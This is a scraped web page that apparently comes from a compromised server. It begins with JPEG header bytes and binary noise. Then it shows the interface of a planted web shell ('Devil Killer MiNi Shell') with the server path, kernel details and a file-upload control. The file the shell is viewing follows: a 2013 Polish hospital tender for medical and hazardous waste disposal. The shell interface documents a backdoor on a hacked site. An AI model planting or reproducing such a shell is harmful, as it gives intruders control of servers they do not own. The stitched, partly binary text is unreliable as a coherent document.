JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131212/516708-N-2013.html

<p class="kh_header"><b>Knurów: Usługa w zakresie odbioru, transportu i unieszkodliwiania odpadów niebezpiecznych i innych niż niebezpieczne</b><br>
<b>Numer ogłoszenia: 516708 - 2013; data zamieszczenia: 12.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital w Knurowie Sp. z o.o. , ul. Niepodległości 8, 44-190 Knurów, woj. śląskie, tel. 32 331 93 34, faks 32 331 93 04.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpitalknurow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa w zakresie odbioru, transportu i unieszkodliwiania odpadów niebezpiecznych i innych niż niebezpieczne.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa obejmująca odbiór, transport (przewóz)                                         i unieszkodliwianie odpadów niebezpiecznych i innych niż niebezpieczne przez Wykonawcę ze Szpitala w Knurowie Sp. z o.o. prowadzącego działalność przy ul. Niepodległości 8, 44-190  Knurów zgodnie z wymogami:
1. ustawy z dnia 19 sierpnia 2011 r. o przewozie towarów niebezpiecznych (Dz.U. 2011 r. nr 227 poz. 1367 z późn. zm.) 
2. rozporządzenia Ministra Zdrowia z 30 lipca 2010 r. w sprawie szczegółowego sposobu postępowania z odpadami medycznymi (Dz.U. 2010 r. nr 139 poz. 940) 
3. ustawy z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (t.j. Dz.U. 2013 r. nr 0 poz. 1232)
4. ustawy z dnia 14 grudnia 2012 r. o odpadach (t.j. Dz.U. 2013 r. nr 0 poz. 21 z późn. zm.)
5.ustawa z dnia 6 września 2001 r. o transporcie drogowym (t.j. Dz.U. 2012 r. nr 0 poz. 1265)
6.rozporządzenie Ministra Zdrowia z dnia 21 grudnia 2002 r. w sprawie dopuszczenia sposobów i warunków unieszkodliwiania odpadów medycznych i weterynaryjnych (Dz.U. 2003 r. nr 8 poz. 104 z późn. zm.)
 7 .	rozporządzenia Ministra środowiska z dnia 8 grudnia 2010 r. w sprawie wzorów dokumentów stosowanych na potrzeby ewidencji odpadów (Dz.U. 2010 r. nr 249 poz. 1673)
 8 .	rozporządzeniem Ministra Środowiska z dnia 27 września 2001 r. w sprawie katalogu odpadów (Dz.U. 2001 r. nr 112 poz. 1206).
Szczegółowy opis przedmiotu zamówienia określony został w Załączniku nr 9 Formularz cenowy do SIWZ. Symbole klasyfikacyjne podano zgodnie z rozporządzeniem Ministra Środowiska z dnia 27 września 2001 r. w sprawie katalogu odpadów (Dz.U. 2001 r. nr 112 poz. 1206). Ilości przedmiotu zamówienia zawarte w Załączniku Nr 9 Formularz cenowy są ilościami szacunkowymi. Zamawiający będzie składał w ciągu trwania umowy zamówienia wg rzeczywistych potrzeb. Zamawiający zastrzega sobie prawo niewykorzystania w pełni ilości odpadów a Wykonawca nie będzie miał z tego tytułu roszczeń. Zamawiający zastrzega sobie prawo w trakcie realizacji niniejszej umowy do zmiany ilości odpadów w poszczególnych pozycjach tj. do wykorzystania niektórych pozycji w ilościach mniejszych lub do zwiększenia ilości niektórych pozycji, jednocześnie nie przekraczając całkowitej wartości umowy bez konsekwencji prawnych i finansowych ze strony Wykonawcy.
Przedmiot zamówienia podzielony został na dwie części. 
Część I - odpady niebezpieczne i inne niż niebezpieczne: odpady medyczne i odpady weterynaryjne
Część II - odpady niebezpieczne i inne niż niebezpieczne
WARUNKI DODATKOWE DOTYCZĄCE PRZEDMIOTU ZAMÓWIENIA                             W ZAKRESIE CZĘŚCI I:
Część I obejmuje odpady medyczne klasyfikowane w grupie 1801 zgodnie z katalogiem odpadów stanowiącym załącznik do rozporządzenia Ministra Środowiska z dnia 27 września 2001 r. w sprawie katalogu odpadów (Dz.U. 2001 r. nr 112 poz. 1206) oraz odpady weterynaryjne klasyfikowane w grupie 1802 zgodnie z katalogiem odpadów stanowiącym załącznik do rozporządzenia Ministra Środowiska z dnia 27 września 2001 r. w sprawie katalogu odpadów (Dz.U. 2001 r. nr 112 poz. 1206).
Odpady medyczne wytwarzane przez Zamawiającego przygotowane będą do unieszkodliwiania zgodnie z rozporządzenia Ministra Zdrowia z 30 lipca 2010 r. w sprawie szczegółowego sposobu postępowania z odpadami medycznymi (Dz.U. 2010 r. nr 139 poz. 940).
Specyfikację odpadów chemicznych o kodzie 180106* zawiera Załącznik nr 8. 
Wykonawca zobowiązuje się ze swojej strony zapewnić Zamawiającemu na czas realizacji zamówienia nieodpłatnie pojemniki plastikowe z zamykaną uchylną pokrywą do składowania odpadów o kodzie: 
1.	180103* - 4  pojemniki o pojemności 1100 litrów
2.	180106* - 1 pojemnik o pojemności 160 litrów lub 240 litrów
3.	180108* - 1 pojemnik o pojemności 100 litrów lub 120 litrów
4.	180102* - 9 czerwonych pojemników o pojemności 30 litrów i 4 czerwone pojemniki o pojemności 60 litrów z pokrywą, dostarczanych co najmniej jeden raz w miesiącu.
Zamawiający zastrzega sobie, że ilość pojemników na odpady o kodzie 180102* może ulec zwiększeniu max. o 2 czerwone pojemniki 30 litrowe i max. 2 czerwone pojemniki 60 litrowe.

Dotyczy: Części I i Części II
Odbiór odpadów z:
- Części I z placówki Zamawiającego będzie dokonywany specjalistycznymi środkami transportu Wykonawcy, na koszt i ryzyko Wykonawcy. Odbiór odpadów odbywać się będzie dwa razy w tygodniu we wtorki i piątki (jeżeli dzień odbioru przypadnie w dzień świąteczny odbiór odpadów nastąpi w dniu uzgodnionym z Zamawiającym) w godzinach od 08:00 do 14:00. Zamawiający zastrzega sobie prawo do zlecenia odbioru odpadów trzeci raz w tygodniu, w przypadku, gdy wystąpi taka potrzeba. Zamówienie transportu trzeci raz w tygodniu nastąpi telefonicznie. W nagłych wypadkach Zamawiający zastrzega sobie czas interwencji 24 godziny od zgłoszenia.
- Części II z placówki Zamawiającego będzie dokonywany specjalistycznymi środkami transportu Wykonawcy, na koszt i ryzyko Wykonawcy. Odbiór odpadów odbywać się będzie w zależności od potrzeb Zamawiającego. Konieczność odbioru odpadów Zamawiający będzie zgłaszał Wykonawcy faksem. Wykonawca zobowiązany jest do odbioru odpadów w terminie  dwóch dni roboczych licząc od dnia następującego po dniu zgłoszenia przez Zamawiającego konieczności odbioru odpadów. W nagłych wypadkach Zamawiający zastrzega sobie czas interwencji 24 godziny od zgłoszenia.
Dotyczy Części I i Części II:
Ważenie odpadów powinno odbywać się każdorazowo w pojemnikach, na wadze umiejscowionej na samochodzie Wykonawcy, z zastrzeżeniem, iż w przypadku odpadów składowanych w workach dopuszcza się możliwość ważenia odpadów w workach.
Zamawiający wyraża zgodę na wyposażenie przez Wykonawcę Szpitala w wagę do ważenia odpadów na czas trwania umowy, zamiennie dla wagi umieszczonej na samochodzie Wykonawcy pod warunkiem, że wymiar wagi nie przekroczy wymiaru 1m x 1m. 
Każdy odbiór musi być potwierdzony kartą przekazania odpadów zgodnie z rozporządzeniem Ministra środowiska z dnia 8 grudnia 2010 r. w sprawie wzorów dokumentów stosowanych na potrzeby ewidencji odpadów. 
Wykonawca ponosi całkowitą odpowiedzialność za wykonanie usługi zgodnie z obowiązującymi przepisami prawa.
Zamawiający dopuszcza wykonywanie części zamówienia przy pomocy podwykonawców. 
W przypadku zamiaru powierzenia przez Wykonawcę części usługi podwykonawcom Zamawiający będzie wymagał wskazania w ofercie części zamówienia, której wykonanie zamierza powierzyć podwykonawcom.  
Zgodnie z art. 20 ust. 2 ustawy z dnia 14 grudnia 2012 r. o odpadach Wykonawca zobowiązany jest do unieszkodliwiania zakaźnych odpadów medycznych i zakaźnych odpadów weterynaryjnych na obszarze województwa śląskiego. Dopuszcza się unieszkodliwienie zakaźnych odpadów medycznych i zakaźnych odpadów weterynaryjnych na obszarze województwa innego niż śląskie, w najbliżej położonej instalacji, w przypadku braku instalacji do unieszkodliwiania tych odpadów na obszarze województwa śląskiego lub gdy istniejące instalacje nie mają wolnych mocy przerobowych.
Wykonawca jest także zobowiązany do stosowania wymogów określonych w art. 95 ust.2 i 3 ustawy z dnia 14 grudnia 2012 r. o odpadach.
Przedmiot zamówienia podzielony został na 2 Części. Zamawiający dopuszcza składanie ofert częściowych. Zabrania się składania ofert częściowych w ramach danej Części. Dla każdej części zamówienia zostanie podpisana odrębna umowa.
1.	Zamawiający nie przewiduje zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp.
2.	Zamawiający nie dopuszcza składania ofert wariantowych.
3.	Nie przewiduje się wniesienia zabezpieczenia należytego wykonania umowy. 
4.	Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej.  
5.	Zamawiający nie przewiduje zawarcia umowy ramowej. 
6.	Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów. 
7.	Zamawiający nie przewiduje rozliczania w walutach obcych.
8.	Zamawiający nie przewiduje zebrania wszystkich Wykonawców w celu wyjaśnienia wątpliwości dotyczących treści SIWZ. 
Wymagany termin realizacji zamówienia wynosi 12 miesięcy licząc od 04.02.2014 r. do 03.02.2015 r.
Zamówienie publiczne o wartości poniżej 200 000 euro.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.52.40.00-6, 90.53.30.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi  wykazać, że posiada: 
- w zakresie Części I decyzję (zezwolenie lub pozwolenie) wydaną przez właściwy organ dotyczącą transportu, zbierania oraz unieszkodliwiania odpadów o kodach wskazanych w Załączniku Nr 9 Formularz cenowy Część I zgodnie z ustawą z dnia 14 grudnia 2012 r. o odpadach. 
- w zakresie Części II decyzję (zezwolenie lub pozwolenie) wydaną przez właściwy organ dotyczącą transportu, zbierania oraz unieszkodliwiania odpadów o kodach wskazanych w Załączniku Nr 9 Formularz cenowy Część II zgodnie z ustawą z dnia 14 grudnia 2012 r. o odpadach 
Ocena spełnienia warunków dokonana zostanie na podstawie przedstawionych przez Wykonawcę oświadczeń i dokumentów. Dokumenty będą oceniane w trybie spełnia/nie spełnia, czyli nie spełnia warunku - za brak dokumentu lub oświadczenia, spełnia warunek - za przedstawienie ważnego dokumentu lub oświadczenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać,  że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie wykonał co najmniej dwie usługi w zakresie odbioru, transportu i unieszkodliwia odpadów niebezpiecznych z placówek szpitalnych zgodnie z ustawą z dnia 14 grudnia 2012 r. o odpadach o wartości nie niższej niż:
	- w zakresie Części I  90 000 złotych brutto na rok  każda - Załącznik nr 5
	- w zakresie Części II  3 000 złotych brutto na rok każda - Załącznik nr 5. 
W przypadku składania przez Wykonawcę oferty na Część I i Część II Wykonawca zobowiązany jest do przedstawienia dwóch odrębnych referencji na każdą z części. Wykonawca nie może posłużyć się tymi samymi referencjami w zakresie Części I              i Części II, chyba że wykonane usługi odpowiadały zakresem Części I i Części II niniejszego zamówienia łącznie co do przedmiotu umowy, a ich wartość wyniosła nie mniej niż 93 000 zł brutto dla każdej usługi. 
Ocena spełnienia warunków dokonana zostanie na podstawie przedstawionych przez Wykonawcę oświadczeń i dokumentów. Dokumenty będą oceniane w trybie spełnia/nie spełnia, czyli nie spełnia warunku - za brak dokumentu lub oświadczenia, spełnia warunek - za przedstawienie ważnego dokumentu lub oświadczenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Wykonawca musi złożyć oświadczenie o spełnianiu warunków udziału w postępowaniu określonych  w art. 22 ust. 1 ustawy Pzp;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Wykonawca musi złożyć oświadczenie o spełnianiu warunków udziału w postępowaniu określonych  w art. 22 ust. 1 ustawy Pzp;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się posiadaniem: ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia wraz z dowodem potwierdzającym opłacenie polisy o sumie gwarancyjnej nie niższej niż 90 000 zł. 
Ocena spełnienia warunków dokonana zostanie na podstawie przedstawionych przez Wykonawcę oświadczeń i dokumentów. Dokumenty będą oceniane w trybie spełnia/nie spełnia, czyli nie spełnia warunku - za brak dokumentu lub oświadczenia, spełnia warunek - za przedstawienie ważnego dokumentu lub oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pozostałe wymagane przez Zamawiającego dokumenty, jakie należy do oferty załączyć:
1. Formularz ofertowy Załącznik nr 1 - wypełniony, podpisany i opieczętowany (pieczątką firmową lub imienną) przez Wykonawcę;
2. Formularz cenowy - Załącznik nr 9 wypełniony, podpisany przez Wykonawcę;
3. Oświadczenie Wykonawcy o akceptacji Wzoru umowy (Załącznik nr 2) - Wykonawca składa na Załączniku nr 1 Formularz ofertowy; 
4. Oświadczenie Wykonawcy zawierające wskazanie przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom - Wykonawca składa na Załączniku nr 1 Formularz ofertowy; 
5. Listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt. 5 ustawy Pzp albo informację o tym, że Wykonawca nie należy do grupy kapitałowej - zgodnie z Załącznikiem nr 6 do SIWZ. 
6. Pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu Wykonawcy składającego ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów (w tym w przypadku spółki cywilnej/konsorcjum w celu ustalenia podmiotu uprawnionego do występowania w imieniu grupy, jeżeli nie wynika ono z dokumentów załączonych do oferty np. umowy spółki cywilnej/konsorcjum).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany umowy: 
1. Zamawiający zastrzega sobie, że ilość pojemników na odpady o kodzie 180102* może ulec zwiększeniu max. o 2 czerwone pojemniki 30 litrowe i max. 2 czerwone pojemniki 60 litrowe - dotyczy Wzoru umowy w zakresie Części I
2. Dotyczy Części I i Części II: Zmiana ceny z oferty może nastąpić wyłącznie w następujących przypadkach:
a)	dopuszczalna jest zmiana wynagrodzenia Wykonawcy wyłącznie w przypadku zmiany powszechnie obowiązujących przepisów w zakresie wysokości stawki podatku od towarów i usług na przedmiot świadczenia zmianie wówczas ulega cena brutto a cena netto pozostaje bez zmian - zmiana ta nie wymaga aneksu do umowy.
b)	obniżenie ceny jednostkowej przez Wykonawcę może nastąpić w każdym czasie i nie wymaga zgody Zamawiającego ani sporządzania aneksu do umowy.
4. Zamawiający zastrzega sobie prawo zmiany częstotliwości wywozu odpadów jeżeli zmiany wynikają z potrzeb Zamawiającego lub zmieniających się przepisów prawa - dotyczy Wzoru umowy w zakresie Części I i Części II.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpitalknurow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Niepodległości 8, 44-190 Knurów, Budynek Zarządu, I piętro, pokój nr 21.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.12.2013 godzina 11:00, miejsce: ul. Niepodległości 8, 44-190 Knurów, Budynek Zarządu, I piętro, Sekretariat, pokój nr 24.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usługa w zakresie odbioru, transportu i unieszkodliwiania odpadów niebezpiecznych i innych niż niebezpieczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa obejmująca odbiór, transport (przewóz)                                         i unieszkodliwianie odpadów niebezpiecznych i innych niż niebezpieczne przez Wykonawcę ze Szpitala w Knurowie Sp. z o.o. prowadzącego działalność przy ul. Niepodległości 8, 44-190  Knurów - Część I - odpady niebezpieczne i inne niż niebezpieczne: odpady medyczne i odpady weterynaryjne. Szczegółowy opis przedmiotu zamówienia określony został w Załączniku nr 9 Formularz cenowy do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.52.40.00-6, 90.53.30.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
